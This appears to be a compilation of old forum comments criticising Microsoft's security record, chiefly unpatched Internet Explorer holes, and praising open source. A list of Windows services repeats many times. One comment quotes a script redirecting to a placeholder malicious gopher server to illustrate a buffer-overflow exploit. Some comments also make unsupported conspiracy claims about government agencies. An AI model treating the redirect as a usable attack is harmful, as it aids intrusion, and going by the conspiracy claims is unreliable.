4. Generic Host Process for Win32 Services (Requires server rights.)
5. Microsoft Application Error Reporting
6. Microsoft Baseline Security Analyzer
7. Microsoft Direct Play Voice Test
8. Microsoft Help and Support Center
9. Microsoft Help Center Hosting Server (Wants server rights.)
10. Microsoft Management Console
11. Microsoft Media Player (tells Microsoft the music you like)
12. Microsoft Network Availability Test
13. Microsoft Volume Shadow Copy Service
14. MS DTC Console program
15. Run DLL as an app
16. Services and Controller app
17. Time Service, sets the time on your computer from Microsoft's computer.
18. Microsoft Office keeps a number in each file you create that identifies your computer. Microsoft has never said why.
19. Microsoft mouse software has reduced functionality until you let it connect to Microsoft computers.

1. Application Layer Gateway Service (Requires server rights.)
2. Fax Service
3. File Signature Verification
4. Generic Host Process for Win32 Services (Requires server rights.)
5. Microsoft Application Error Reporting
6. Microsoft Baseline Security Analyzer
7. Microsoft Direct Play Voice Test
8. Microsoft Help and Support Center
9. Microsoft Help Center Hosting Server (Wants server rights.)
10. Microsoft Management Console
11. Microsoft Media Player (tells Microsoft the music you like)
12. Microsoft Network Availability Test
13. Microsoft Volume Shadow Copy Service
14. MS DTC Console program
15. Run DLL as an app
16. Services and Controller app
17. Time Service, sets the time on your computer from Microsoft's computer.
18. Microsoft Office keeps a number in each file you create that identifies your computer. Microsoft has never said why.
19. Microsoft mouse software has reduced functionality until you let it connect to Microsoft computers.

1. Application Layer Gateway Service (Requires server rights.)
2. Fax Service
3. File Signature Verification
4. Generic Host Process for Win32 Services (Requires server rights.)
5. Microsoft Application Error Reporting
6. Microsoft Baseline Security Analyzer
7. Microsoft Direct Play Voice Test
8. Microsoft Help and Support Center
9. Microsoft Help Center Hosting Server (Wants server rights.)
10. Microsoft Management Console
11. Microsoft Media Player (tells Microsoft the music you like)
12. Microsoft Network Availability Test
13. Microsoft Volume Shadow Copy Service
14. MS DTC Console program
15. Run DLL as an app
16. Services and Controller app
17. Time Service, sets the time on your computer from Microsoft's computer.
18. Microsoft Office keeps a number in each file you create that identifies your computer. Microsoft has never said why.
19. Microsoft mouse software has reduced functionality until you let it connect to Microsoft computers.

1. Application Layer Gateway Service (Requires server rights.)
2. Fax Service
3. File Signature Verification
4. Generic Host Process for Win32 Services (Requires server rights.)
5. Microsoft Application Error Reporting
6. Microsoft Baseline Security Analyzer
7. Microsoft Direct Play Voice Test
8. Microsoft Help and Support Center
9. Microsoft Help Center Hosting Server (Wants server rights.)
10. Microsoft Management Console
11. Microsoft Media Player (tells Microsoft the music you like)
12. Microsoft Network Availability Test
13. Microsoft Volume Shadow Copy Service
14. MS DTC Console program
15. Run DLL as an app
16. Services and Controller app
17. Time Service, sets the time on your computer from Microsoft's computer.
18. Microsoft Office keeps a number in each file you create that identifies your computer. Microsoft has never said why.
19. Microsoft mouse software has reduced functionality until you let it connect to Microsoft computers.

1. Application Layer Gateway Service (Requires server rights.)
2. Fax Service
3. File Signature Verification
4. Generic Host Process for Win32 Services (Requires server rights.)
5. Microsoft Application Error Reporting
6. Microsoft Baseline Security Analyzer
7. Microsoft Direct Play Voice Test
8. Microsoft Help and Support Center
9. Microsoft Help Center Hosting Server (Wants server rights.)
10. Microsoft Management Console
11. Microsoft Media Player (tells Microsoft the music you like)
12. Microsoft Network Availability Test
13. Microsoft Volume Shadow Copy Service
14. MS DTC Console program
15. Run DLL as an app
16. Services and Controller app
17. Time Service, sets the time on your computer from Microsoft's computer.
18. Microsoft Office keeps a number in each file you create that identifies your computer. Microsoft has never said why.
19. Microsoft mouse software has reduced functionality until you let it connect to Microsoft computers.

1. Application Layer Gateway Service (Requires server rights.)
2. Fax Service
3. File Signature Verification
4. Generic Host Process for Win32 Services (Requires server rights.)
5. Microsoft Application Error Reporting
6. Microsoft Baseline Security Analyzer
7. Microsoft Direct Play Voice Test
8. Microsoft Help and Support Center
9. Microsoft Help Center Hosting Server (Wants server rights.)
10. Microsoft Management Console
11. Microsoft Media Player (tells Microsoft the music you like)
12. Microsoft Network Availability Test
13. Microsoft Volume Shadow Copy Service
14. MS DTC Console program
15. Run DLL as an app
16. Services and Controller app
17. Time Service, sets the time on your computer from Microsoft's computer.
18. Microsoft Office keeps a number in each file you create that identifies your computer. Microsoft has never said why.
19. Microsoft mouse software has reduced functionality until you let it connect to Microsoft computers.

1. Application Layer Gateway Service (Requires server rights.)
2. Fax Service
3. File Signature Verification
4. Generic Host Process for Win32 Services (Requires server rights.)
5. Microsoft Application Error Reporting
6. Microsoft Baseline Security Analyzer
7. Microsoft Direct Play Voice Test
8. Microsoft Help and Support Center
9. Microsoft Help Center Hosting Server (Wants server rights.)
10. Microsoft Management Console
11. Microsoft Media Player (tells Microsoft the music you like)
12. Microsoft Network Availability Test
13. Microsoft Volume Shadow Copy Service
14. MS DTC Console program
15. Run DLL as an app
16. Services and Controller app
17. Time Service, sets the time on your computer from Microsoft's computer.
18. Microsoft Office keeps a number in each file you create that identifies your computer. Microsoft has never said why.
19. Microsoft mouse software has reduced functionality until you let it connect to Microsoft computers.

1. Application Layer Gateway Service (Requires server rights.)
2. Fax Service
3. File Signature Verification
4. Generic Host Process for Win32 Services (Requires server rights.)
5. Microsoft Application Error Reporting
6. Microsoft Baseline Security Analyzer
7. Microsoft Direct Play Voice Test
8. Microsoft Help and Support Center
9. Microsoft Help Center Hosting Server (Wants server rights.)
10. Microsoft Management Console
11. Microsoft Media Player (tells Microsoft the music you like)
12. Microsoft Network Availability Test
13. Microsoft Volume Shadow Copy Service
14. MS DTC Console program
15. Run DLL as an app
16. Services and Controller app
17. Time Service, sets the time on your computer from Microsoft's computer.
18. Microsoft Office keeps a number in each file you create that identifies your computer. Microsoft has never said why.
19. Microsoft mouse software has reduced functionality until you let it connect to Microsoft computers.

1. Application Layer Gateway Service (Requires server rights.)
2. Fax Service
3. File Signature Verification
4. Generic Host Process for Win32 Services (Requires server rights.)
5. Microsoft Application Error Reporting
6. Microsoft Baseline Security Analyzer
7. Microsoft Direct Play Voice Test
8. Microsoft Help and Support Center
9. Microsoft Help Center Hosting Server (Wants server rights.)
10. Microsoft Management Console
11. Microsoft Media Player (tells Microsoft the music you like)
12. Microsoft Network Availability Test
13. Microsoft Volume Shadow Copy Service
14. MS DTC Console program
15. Run DLL as an app
16. Services and Controller app
17. Time Service, sets the time on your computer from Microsoft's computer.
18. Microsoft Office keeps a number in each file you create that identifies your computer. Microsoft has never said why.
19. Microsoft mouse software has reduced functionality until you let it connect to Microsoft computers.

Are any of IE's 18 known vulnerabilities patched in this update?

How can this be?

Well, simple really:

• 1. You're not telling the truth. The link and count you gave was for all patches against Red Hat 7.2 since its release, not "alone in 2002" -- and includes enhancements as well as security patches. Microsoft doesn't hand out enhancements to its software as patches -- it charges for them as new releases.
• 2. Red Hat has more software. The amount of functionality Red Hat ships dwarfs that available in Windows. The diversity of software shipped on two or three CDs of Red Hat dwarfs that in a comparable amount of OS and application distribution from Microsoft. Microsoft has a few large "integrated" applications, whereas Red Hat has many smaller, intercompatible ones.
• 3. Red Hat doesn't delay and hide. Microsoft has a practice of delaying patches and releasing several in one bundled "service pack" -- whereas Red Hat releases one patch per problem, promptly. That inflates the counts on Red Hat's side, but improves the actual security -- and actions count more than words, or numbers.
• 4. Red Hat actually releases fixes! Microsoft's software has at least 18 publicly known, exploitable, unpatched vulnerabilities -- and that's just in one product, Internet Explorer. Show me a comparable list for any current version of any open-source product or distribution.

"Do tell us not just that he's wrong, but why."

The mathematics is absolutely stupid! The author assumes that bugs are a random event. But they aren't. Bugs are heavily influenced by sociological factors that affect the outcome by more than a factor of ten. A lot of the bugs you seen in Microsoft Internet Explorer, for example, come from the sloppy practices of programmers who are not particularly interested in what they are doing and who are pushed to a tight schedule, so when they see that something needs to be re-written, they can't re-write it, because they don't have time.

Remember when Microsoft released Windows 2000? Someone inside Microsoft said that there were still 63,000 bugs (or known shortcomings) in their database. There was no time to finish the job, and Windows 2000 and Windows XP are still quirky. I just reported a bug in Windows XP, again, which I first saw in Windows 98. All of those operating systems re-configure themselves without telling the user. The company just doesn't care enough to do a good job.

Bugs in software are caused by social factors that we cannot measure. Some programmers write far tighter code than others. Compare the security bugs in OpenBSD and in Windows. OpenBSD is far more secure because the people who control it say they want it that way. Microsoft just announced a greater interest in security, but will the company actually devote resources to fixing the code? That's a sociological issue for a company that has always put money first.

It is impossible to test reliability into software, or anything! Reliability is due to design decisions, or the lack of them.

The author says,

"Reliability growth models seek to make this more precise. Suppose that the probability that the i-th bug remains undetected after t random tests is e-Eit. The models cited above show that, after a long period of testing and bug removal, the net effect of the remaining bugs will under certain assumptions converge to a polynomial rather than exponential distribution. In particular, the probability E of a security failure at time t, at which time n bugs have been removed, is [Equation that Slashdot cannot display: E = 1X i=n+1 e-Eit ~~ K=t] over a wide range of values of t. I give in the appendix a brief proof of why this is the case, following the analysis by Brady, Anderson and Ball [7]. For present purposes, note that this explains the slow reliability growth observed in practice."

He is just pulling your leg, and probably his own. Note the word "random" in the second sentence. In mathematics that is a technical term, a precisely defined term, and it doesn't apply here.

The author is just grabbing attention, and it worked. Now he has something to put on his resume, an article in CNET (by someone who doesn't understand the mathematics, but assumes that it must be okay, because it looks so impressive).

Show me the equation that has a term that explains the difference between OpenBSD (Five years without a remote hole in the default install!) and Windows XP (zero seconds).

Give the source code of Internet Exploder to the OpenBSD coders, and we will see how random bugs are. They could do what they already did with BSD, examine the code for poor practices, and re-design the parts that need it. Then all the "randomness" would stop happening, as if (in the view of some) by magic.

1. Install the latest Windows service packs and patches.
2. Re-install the latest chipset drivers.
3. Re-install Microsoft DirectX 8.1 or higher.
4. Re-install the motherboard manufacturer's ATA storage driver.
5. You probably won't need to re-install other device drivers, but this is the time to do it.

"This is one of the better comments on this thread."

To me, these comments seem utterly out of touch with reality. I find bugs and insufficiencies in open source software. But generally open source software impresses me as an attempt to do a good job.

In contrast, Microsoft software seems just sloppy. For example, Microsoft's Internet Explorer has 18 unpatched security bugs (when this was written). These active security risks are different from the recent 15 that have already been fixed. This is sloppiness, not mistakes, and I don't find anything like it in the open source world.

When I have a problem with open source software, I find that I can get help. When I call Microsoft, I find that, usually, no one with whom I am allowed to talk knows any answers. Right now, for example, no one seems to know how to repair a new, Intel Motherboard, Windows XP installation that won't create a virtual memory paging file. It's buggy, and nothing can be done other than re-install the OS and all the applications.

If you find a big problem in open source software, chances are that you will communicate directly with the main authors. With Microsoft, I have not been able to get answers. This article says that the Psychic Friends Network is equally as good as Microsoft technical support: Microsoft Technical Support vs. The Psychic Friends Network The conclusion of the article seems reasonable considering my experience with Microsoft. Neither organization has useful answers, but The Psychic friends Network is more friendly and less expensive.

If you are using Windows or Outlook

... then stop using Outlook. No, I'm not kidding. Outlook uses the same HTML rendering code that Internet Explorer does, doesn't it? That makes it vulnerable to many of the frequently discovered, slowly patched security holes that IE has run across over the last few years.

People need to be taught not to run untrusted executable files, true... but what good does that do when they can be vulnerable to a system compromise by just looking at the preview pane of an infected email?

Linux is the backbone of a social revolution. The underlying issue of this Slashdot story is not how to build the kernel, but how to manage the part of the new technical and sociological revolution that is connected to having a universal operating system.

Linux has proven to be an operating system that everyone can rally around. Some governments and large businesses have already adopted it. We live in a world in which much of the infrastructure is guided by computer programs, so strong support for efficient methods of using computers is extremely good news.

Linux is a fundamental backbone of the entire open source software movement. There was far less support for open source software when there were 200 flavors of Unix and none were preferred. Now programmers can write for Linux, and can depend that those who have an interest in other operating systems have experience in re-writing Linux code for the OS they prefer. I use several Linux programs in which Windows OS versions are provided by one person on each team who has volunteered to build the program for Windows. So even Windows benefits from Linux.

Most people don't understand the issues. Partly because Linux has become a foundation of organization for a software revolution, this Slashdot story is one of the most important that I have seen in perhaps two years of reading Slashdot. Yet at the time this comment was posted there are only 27 comments rated 0 and above. An earlier story about a small company going bankrupt has five times as many comments!

The really important (and interesting) questions are beyond the comprehension of most people, apparently.

Apparently the reason that many of the really important problems don't get solved is that the problems are not only beyond the solving capacity of almost everyone, but also beyond the consideration capacity of almost everyone. So a problem like this doesn't receive much attention and help.

No sociologist could have guessed how much proprietary software would fail us. Proprietary software companies seem to be competing with themselves to abuse their customers. For example, Microsoft Windows XP expects to connect to Microsoft computers for more than 12 different reasons. Many of those connections expect to have server rights. Some of the "privacy policies" behind those connections provide little actual privacy, and Microsoft and others have changed their privacy policies, and made the changes retroactive, so, effectively, you agree to some unknown contract in the future. (Microsoft just did this with Hotmail, for example.)

The direction that Microsoft XP has gone makes it not so much an operating system as a money-making scheme. There are a huge number of bugs. For example, a P4 system with an Intel motherboard that was upgraded to Windows XP from a fresh install of Windows 2000 just stops on loading. Behind the blue "Welcome" screen, if you think to press Alt-Tab and look, is a message that says the paging file is too small. That's the kind of double sloppiness those of us who work with Windows see every day: An important message that shouldn't be there because the system was just installed is hidden by another screen. Those who work with Windows are often not very knowlegeable and those who are knowledgeable often don't work with Windows. If they did, they would realize that the situation with this proprietary OS is much worse than they thought. For example, the new menus in Windows XP are often 5 to 7 levels deep.

Proprietary software companies often seem not to have the will to produce good software. For example, Microsoft's Internet Explorer has 18 unpatched security bugs (when this was written). These active security risks are different from the recent 15 that have already been fixed. Why would a company that has 40 billion dollars in the bank let itself get an extremely bad reputation because of software bugs? It doesn't make sense, and Microsoft is not the only software company that is self-destructive in this way.

Another phenomenon that no sociologist could have foreseen is that proprietary software companies have an extreme mode of failure. The brilliant initial organizers sell out and leave, and the company, in an attempt to maximize profits, hires less expensive people who don't quite have the ability to guide the company through rapid technological change. Customers who chose products from that company find those products increasingly inadequate, until eventually they must bear the selection and training expense of choosing an entirely new company and product. Often the product the first company made just dies. In contrast, although it may become abandoned, open source software never truly dies. Even in the worst situation it is ready to be modified and used again.

The open source revolution is helping strengthen our fundamental infrastructure. When I look at the operation of my local state government, the government of Oregon, U.S.A., I see a lot of inefficiency and insufficiency. One realistic method of improving government operations is to have better software. For example, Oregon state courts send out notices of actions by mail, and sometimes the notices are lost. The Oregon courts do not have e-mail notification (but the libraries do). You can see all Oregon state laws on the internet, but not the cases before the courts. Everywhere I look in state government, there are areas that could be improved with better software.

Humans and computers are excellent partners. Computers do exactly the work that humans don't like to do, the repetitive work. A good computer program enforces exact application of whatever policies have been adopted. This is exactly the kind of discipline governments need, because a lot of corruption begins with small deviations from the rules.

Proprietary software written for governments is no better than proprietary software written for single users. It's expensive. It's exact operation is hidden from both government managers and citizens, who cannot verify how it works. The insufficiency and abusiveness of proprietary software companies slows the acceptance of new and better software into government.

When governments of poor countries use proprietary software, they often create political and social problem for themselves. Sending a representative of a very poor country to the U.S. for training can cause jealousy and job-related empire building. In contrast, the expectation created by Linux and other open source programs is that someone can teach himself with help from other people who are interested in the same software.

Linux and all GNU/GPL software is more than just a backbone of a computer revolution, it is the establishing phenomenon of a social revolution that is spreading to other fields. Educators, for example, are working on repeating the successes of Linux by creating open source, free course materials. This makes very good sense. Why not prepare and video tape one course by one especially good teacher, and make it available on the internet to anyone who wants more education?

Open source is an expression of caring. This may be too warm an expression of philosophy for the comfort of many people connected with open source software, but open source is an act of love. There are many ways to express love, and donating your time and brainpower to the world is one of them.

Just as predicted, news media this week seems to be covering the MSIE gopher root exploit with a new focus on Microsoft and their real problems with security, not just the latest hole. One company even goes as far to say that they 'cleaned up Microsoft's mess, once again'. With 18+ un-patched vulnerabilities in line for a fresh MS-fix, this may be the straw that breaks the camel's back.

Citizens should care very much about how the program works, in many cases. Programs written especially for government implement government policy. Citizens should be able to know if the program works the way the policy says. The only way this is possible is through open source software.

File formats are not a simple situation, either. The problem with Microsoft Word, for example, is that the file format is not only in the format itself, but in all the bugs and quirkinesses of the way a particular version of the Word program uses the format. Word is very, very buggy and quirky, in my opinion, but the bugs are more hidden than in Internet Explorer, for example, which has 18 security bugs (at the time this was written) that have not been patched. These are active security risks different from the recent 15 that have already been fixed.

Why would a company that has 40 billion dollars in the bank let itself get an extremely bad reputation because of software bugs? It doesn't make sense, and Microsoft is not the only software company that is self-destructive in this way. Proprietary software is subject to the self-destructiveness that sometimes comes over companies. Open source software protects us from that; if a company becomes self-destructive, someone other group, or even a single programmer in some cases, can take over and help.

&nbsp&nbsp&nbsp&nbspIf you want to compare Linux to Windows, I'd be willing to bet my life that Windows has more security holes. There's only a limited number of people that review Windows' code. GNU/Linux, however is made up of many different smaller components that have the love and affection of their programmers. Linux is made from love. Windows is made from corporate greed. The programmers that make Windows have deadlines and upper management telling them to stop working on one project so they can put resources into creating new features. This is all my opinion, of course, but it's a very logical conclusion.

&nbsp&nbsp&nbsp&nbspThere will probably never be a truly secure operating system as long as humans are involved in making it. We make mistakes. It only takes one overlooked mistake in a protocol or the code for a system to be compromised. A good example is the recent SNMP exploit. The protocol itself was not created with security in mind, so many vendors were vulnerable. The best chance we have at a human created, secure OS is one that focuses on security, such as OpenBSD.

&nbsp&nbsp&nbspIf our government (I'm speaking of my country, the USA) adopted OpenBSD and threw enough resources behind it, other governments would have to throw a whole lot of money and effort into finding something our efforts failed to see. The way things stand though, it wouldn't be terribly difficult to bring our systems crawling to their knees.

&nbsp&nbsp&nbspFor instance, lets say one of the employees at eEye was hired by Cuba to find exploits in NT and remain silent to everyone else, it would cost them very little to hack into our systems. The guys at eEye and other security firms find exploits such as buffer overflows all the time, and I'm sure enough money could convince one employee to commit treason. Heck, they could just use the unpatched exploits already out there and do it for free!

&nbsp&nbsp&nbspThe point is that all we can do as system and network admins is to keep up to date on known exploits. We patch our systems and networks and make it so that only a true hacker could bypass our efforts. Script kiddies would be stopped dead in their tracks and 99.9% of the time, that's all the defense we require. In this respect, the amount of patched exploits should have very little effect on the decision making process. However, keep those unpatched exploits in mind.

&nbsp&nbsp&nbspWelcome to the real world!

Microsoft Internet Explorer: 17 unpatched vulnerabilities.
Netscape/Mozilla: 1 patched vulnerability.
Opera: 1 unpatched vulnerability.

See http://sec.greymagic.com/adv/

Microsoft Internet Explorer: 17 unpatched vulnerabilities.
Netscape/Mozilla: 1 patched vulnerability.
Opera: 1 unpatched vulnerability.

See http://sec.greymagic.com/adv/

If Bill Gates wants to be charitable, why doesn't he fix the bugs in Windows XP, and in Internet Explorer (17 and counting)?

The bugs and deliberate shortcomings in Windows XP are causing me lots of grief now, so I'm particularly aware of them. (I have to support my customers.) I haven't been able to find anyone associated with Microsoft who seems interested in fixing them.

Quite likely the bugs are not fixed because some secret agency of the U.S. government like the CIA or the FBI or the NSA wants the bugs. That may be the reason that the government is giving Microsoft such a sweet deal after the company was found guilty of breaking federal law.

The people who own computers are usually the leaders of any society. The huge number of bugs and deliberate insufficiencies slow us in our work. Making a good product would be the best charity for the whole world.

Giving free copies of Windows to people who would not otherwise buy them is cheap charity. (It's just one CD, and their group is allowed to make copies. The cost is in supervising the program.) Also, remember that they are expected to pay normally for upgrades.

Maybe the free software is donated to groups whom the U.S. government wants to watch. It's possible that the U.S. taxpayer supports what the Gates Foundations are doing, not Bill Gates or his father or wife. That is definitely the kind of sneaky behavior in which the U.S. government has engaged in the past. For evidence of this see What should be the response to violence? .

Anyhow, often rich people give money because they want to feel superior, and like to tinker with other people's lives. Don't look only at how much money is spent; look at the effect of the money. Many times a charitable project is, effectively, merely a method of advancing a rich person's hidden agenda.

Do you think that, in some other area of his life, Bill Gates is a nice guy? I don't think it ever works that way. I'm sympathetic to the troubles he has had in his life, but not accepting of his abuse.

Well, I don't know about you, but I wouldn't be making such bold claims if I was in your shoes. Especially because of the 17 unpatched security holes in IE, and the fact that plenty of these have been known for a long time.

Note that this site also lists one security hole in mozilla, and the version number in which it was fixed.

most imporatant of these that gopher is absolutly archaic.

<script>
document.location.replace("gopher://ev il.gopherser ver.com:7000/buffer_overflow/");
</script>

Second, as always, Microsoft will have a patch out fairly quickly, which is more that can be said for mozilla half of the time...

I'm amazed at how you split one security hole (XMLHTTPRequest) in two to make a "half the time"... :-)

Incidentally, the patch for XMLHTTPRequest was in nightly builds within 48 hours of the bug report, and in the next milestone within about a week. In contrast, there are currently 17 unpatched holes in IE. What was that you were saying about "quickly"?

Gerv

Yep this site specialises in just that
Here

also George Guninski does some research here
Here

and Mr Malware
Here

I wonder if he took into account the difference between remotely exploitable and locally explotable vulnerability?

I also wonder if he took into consideration the Window of Exposure between the discovery of the vulnerability and the release of the patch?

See Closing the Window of Exposure by Bruce Schneier , the security section of David Wheeler's "Why Open Source Software / Free Software (OSS/FS)? Look at the Numbers! and also again visit the disproportionately high number of open vulnerabilities in its Internet Explorer.